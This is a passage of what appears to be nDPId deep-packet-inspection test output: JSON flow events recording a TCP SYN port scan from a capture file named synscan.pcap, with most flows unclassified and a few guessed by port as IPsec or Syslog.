{"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 